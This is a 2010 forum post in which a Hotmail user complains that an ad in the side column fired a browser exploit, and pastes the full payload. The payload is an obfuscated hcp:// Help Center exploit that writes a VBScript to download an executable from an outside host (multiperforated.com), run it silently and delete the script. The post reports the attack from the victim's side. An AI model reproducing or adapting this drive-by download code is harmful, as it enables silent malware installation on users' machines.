EMBEDDED Ad in Hotmail Contains Browser Exploit!!!


  • Hi Hotmail administrators,

    Please check the ads for security problems before you display them in our hotmail side columns!!

    Today when I accessed my account--note I was NOT checking any emails yet so it wasn't from any email that I received--a warning window jumped out asking me whether to allow some script to run:


    hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>Run('cmd /c echo FileName ! @}TEMP}/file.exe@>>}TEMP}/go.vbs]]echo url!@http://multiperforated.com/vr/exe.php-exp!HCP]key!59597fa2ed59979437c16d52ac3144d3@ >>}TEMP}/go.vbs]]echo Set objHTTP ! CreateObject(@MSXML2.XMLHTTP@)>>}TEMP}/go.vbs]]echo Call objHTTP.Open(@GET@, url, False)>>}TEMP}/go.vbs]]echo objHTTP.Send>>}TEMP}/go.vbs]]echo set oStream ! createobject(@Adodb.Stream@)>>}TEMP}/go.vbs]]echo Const adTypeBinary ! 1 >>}TEMP}/go.vbs]]echo Const adSaveCreateOverWrite ! 2 >>}TEMP}/go.vbs]]echo Const adSaveCreateNotExist ! 1  >>}TEMP}/go.vbs]]echo oStream.type ! adTypeBinary>>}TEMP}/go.vbs]]echo oStream.open>>}TEMP}/go.vbs]]echo oStream.write objHTTP.responseBody>>}TEMP}/go.vbs]]echo oStream.savetofile FileName, adSaveCreateNotExist>>}TEMP}/go.vbs]]echo oStream.close>>}TEMP}/go.vbs]]echo set oStream ! nothing>>}TEMP}/go.vbs]]echo Set xml ! Nothing>>}TEMP}/go.vbs]]echo Set WshShell ! CreateObject(@WScript.Shell@)>>}TEMP}/go.vbs]]echo WshShell.Run FileName, 0, True>>}TEMP}/go.vbs]]echo Set FSO ! CreateObject(@Scripting.FileSystemObject@)>>}TEMP}/go.vbs]]echo FSO.DeleteFile @}TEMP}/go.vbs@ >>}TEMP}/go.vbs|cscript }TEMP}/go.vbs>nul'.replace(/!/g, String.fromCharCode(61)).replace(/@/g, String.fromCharCode(34)).replace(/]/g, String.fromCharCode(38)).replace(/{/g, String.fromCharCode(63)).replace(/}/g, String.fromCharCode(37)).replace(/-/g, String.fromCharCode(63)));</script>

    An obvious browser exploit!!!

    At the beginning I thought it must be from somewhere else since I have always trusted Hotmail for it security. But having checked everything else I was doing (I was basically doing nothing else at that time), I decided it was from nowhere else but Hotmail!! Then guess what, I accessed my hotmail several times again and the warning window came back! It was from an ad by https://www.nationalcar.com/. Again, this is not an ad in my email! It is an ad that you have allowed to display in the side column!!

    Please be more careful when you screen the ads!! I have put my whole life on hotmail and I don't want to get a virus one day when I log on to my account.

    Disappointed Customer

    Tuesday, September 28, 2010 8:26 AM